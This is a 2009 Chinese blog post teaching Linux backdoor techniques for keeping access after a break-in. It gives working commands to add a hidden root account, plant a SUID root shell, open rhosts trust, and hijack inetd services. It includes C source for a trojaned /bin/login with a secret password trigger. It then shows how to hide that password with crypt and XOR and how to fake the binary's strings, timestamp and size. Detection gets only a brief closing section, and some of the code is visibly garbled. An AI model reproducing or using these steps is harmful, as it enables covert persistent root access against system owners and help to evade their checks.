黑客高级技巧 Linux后门技术及实践

  •   2009-07-29/12:58
  • 后门简介

    入侵者完全控制系统后,为方便下次进入而采用的一种技术。一般通过修改系统配置文件和安装第三方后门工具来实现。具有隐蔽性,能绕开系统日志,不易被系统管理员发现等特点。

    常用后门技术

    增加超级用户账号

    破解/嗅探用户密码

    放置SUID Shell

    rhosts + +

    利用系统服务程序

    TCP/UDP/ICMP Shell

    Crontab定时任务

    共享库文件

    工具包rootkit

    可装载内核模块(LKM)

    增加超级用户


    # echo "e4gle:x:0:0::/:/bin/sh" >> /etc/passwd 
    # echo "e4gle::-1:-1:-1:-1:-1:-1:500" >> /etc/shadow

    如果系统不允许uid=0的用户远程登录,还需要增加一个普通用户账号。

    破解/嗅探用户密码

    获得shadow文件后,用John the Ripper 工具破解薄弱的用户密码。安装sniffit等嗅探工具,监听telnet、ftp等端口,收集用户密码。

    放置SUID Shell


    # cp /bin/bash /dev/.rootshell 
    # chmod u+s /dev/.rootshell

    普通用户在本机运行/dev/.rootshell,即可获得一个root权限的shell。


    rhosts + + 

    # echo "+ +" > /.rhosts 
    # rsh -l root victim.com csh -i

    远程可以得到一个rootshell。

    利用系统服务程序。

    修改/etc/inetd.conf, daytime stream tcp nowait /bin/sh sh -I ;用trojan程序替换in.telnetd、in.rexecd等inted的服务程序,重定向login程序。

    TCP/UDP/ICMP Shell

    BindShell,大部分是基于TCP/UDP协议的网络服务程序,在高端口监听,很容易被发现。Ping Backdoor,通过ICMP包激活后门,形成一个Shell通道。TCP ACK数据包后门,能够穿越防火墙。
    Crontab定时任务
    通过Crontab程序调度已安装的后门程序定时运行,一般在深夜时段,是系统管理员不在线的时间。

    共享库文件

    在共享库中嵌入后门函数使用后门口令激活Shell,获得权限能够躲避系统管理员对二进制文件本身的校验。

    工具包Rootkit

    包含一系列系统及后门工具:

    - 清除日志中的登录记录

    - 伪装校验和

    - 替换netstat、ps等网络工具

    - 后门登录程序易于安装和使用

    可装载内核模块(LKM)

    LKM:Loadable Kernel Modules 动态的加载,不需要重新编译内核。

    截获系统调用,具有隐藏目录、文件、进程、网络连接等强大功能。

    自身隐蔽性好,发现难度较大。

    著名的LKM包有adore和knark。

    后门的检测

    以自己的经验,结合特定的工具,手工作一些检测。使用Tripwire或md5校验来检查系统。借助IDS系统,监听到目标机器的可疑网络连接。

    实例:Login后门

    入侵者先把原始的/bin/login备份,再用一段程序替换/bin/login。入侵者telnet登录进来的时候,通过环境变量或者终端类型,传递了正确的后门密码,将直接获得一个Shell;如果是普通用户登录,将会重定向到原始的login文件,来处理正常的登录。

    最简单的login后门ulogin.c源代码如下:

    实例:login后门


    #include <stdio.h> 
    #define PASSWORD "passWORD" 
    #define _PATH_LOGIN "/sbin/logins" 

    main (argc, argv, envp) 
    int argc; 
    char **argv, **envp; 

    char *display = getenv("DISPLAY"); 
    if ( display == NULL ) { 
    execve(_PATH_LOGIN, argv, envp); 
    perror(_PATH_LOGIN); 
    exit(1); 

    if (!strcmp(display,PASSWORD)) { 
    system("/bin/csh"); 
    exit(1); 

    execve(_PATH_LOGIN, argv, envp); 
    exit(1); 
    }
    利用后门登录
    首先Telnet服务是打开的,在自己机器上:


    bash$ export DISPLAY=passWORD 
    bash$ telnet victim.com 
    Trying xxx.xxx.xxx.xxx... 
    Connected to victim.com (xxx.xxx.xxx.xxx). 
    Escape character is '^]'. 
    % _

    Strings命令

    strings命令能够打印出二进制文件中的可显示字符串,用于刚才的ulogin程序:


    bash$ strings ulogin 
    /lib/ld-linux.so.2 
    .............. 
    DISPLAY 
    /sbin/logins 
    passWORD 
    /bin/csh

    加密后门密码

    1,采用DES算法,即crypt( )函数,编写gen.c程序:


    #include <unistd.h> 
    main(int argc, char *argv[]) 

    if (argc != 3) { 
    printf("usage: %s <password> <salt>\n", argv[0]); 
    exit(1); 

    printf("%s\n", crypt(argv[1], argv[2])); 
    }

    2、编译为gen,执行./gen hack ui,得到的shadow结果为UiVqMWvDrIQjA。

    3、修改后门源程序ulogin.c:

    -- 以密文形式的密码代替ulogin.c中define的宏PASSWORD值。

    -- 如果后门密码正确,直接给出Shell:


    if (!strcmp(PASSWORD, crypt(display,PASSWORD))) 

    system(SHELL); 
    exit(1); 
    }

    用strings命令只能看到加密过的密码。

    采用异或(XOR)算法,以十六进制方式表示字符串,以达到non- printable的效果。

    1、编码程序encode.c如下:

    char magic[]="\x71\x67\x6d\x7a\x65\x61\x7a"; 
    char *de(char *str,char *key) 

    int i=0,j=0,len; 
    len=strlen(key); 
    while(str[i] != '\0') { 
    str[i]^=key[j]; 
    j++; 
    if(j==len) j=0; 
    i++; 

    return str; 

    void display(char *str) 

    int i; 
    for(i=0;i<strlen(str);i++) printf("]); 
    printf("\n"); 

    main() 

    char gets[100], *ptr; 
    ptr=gets; 
    scanf ("%s",ptr); 
    de(ptr,magic);display(ptr); 
    }

    2、编译程序encode,依次执行得到关键字符串与magic串异或后的结果,例如原始login的文件名/sbin/xlogin,经过异或后为:

    \x5e\x14\xf\x13\xb\x4e\x2\x1d\x8\xa\x13\xb
    3、在后门源代码中这样定义:
    Char

    login[]="\x5e\x14\xf\x13\xb\x4e\x2\x1d\x8\xa\x13\xb";

    然后插入异或函数char *de()结合同一magic串,就能判断出正确的后门密码。

    用strings命令看不到密码、路径等字符串了。

    最后的修饰

    使后门程序ulogin的strings输出类似于正常login的strings输出,做法为:

    在ulogin.c代码中增加一个字符串数组char strings[] ="";,在引号中填入正常login程序的strings输出结果。以假乱真,增加迷惑性。

    调整后门程序的文件日期、大小等属性:

    1、日期

    # ls -l /sbin/xlogin

    -r-sr-xr-x root root 19300 Feb 11 1998

    /sbin/xlogin

    # touch -t 199802110000 ulogin

    # _

    2、调整大小

    # ls -l ulogin /sbin/xlogin

    -r-sr-xr-x root root 7542 Feb 11 1998 ulogin

    -r-sr-xr-x root root 19300 Feb 11 1998 /sbin/xlogin

    # bc

    19300-7542

    11758

    # dd if=/sbin/xlogin of=/tmp/t bs=11758 count=1

    1+0 records in

    1+0 records out

    11758 bytes transferred in 0.000379 secs (31016746

    bytes/sec)

    # cat /tmp/t >> ulogin

    Login后门的检测

    使用命令md5sum对现有/bin/login文件作校验,与以前的值作比较。

    使用Red Hat Linux的RPM校验:

    # rpm -V util-linux

    在入侵者已经利用后门登录的情况下,who是看不到用户的,查看系统进程,查找login -h xxx.xxx.xxx.xxx的字样。


    评论 {{userinfo.comments}}

    {{money}}

    {{question.question}}

    A {{question.A}}
    B {{question.B}}
    C {{question.C}}
    D {{question.D}}
    提交

    驱动号 更多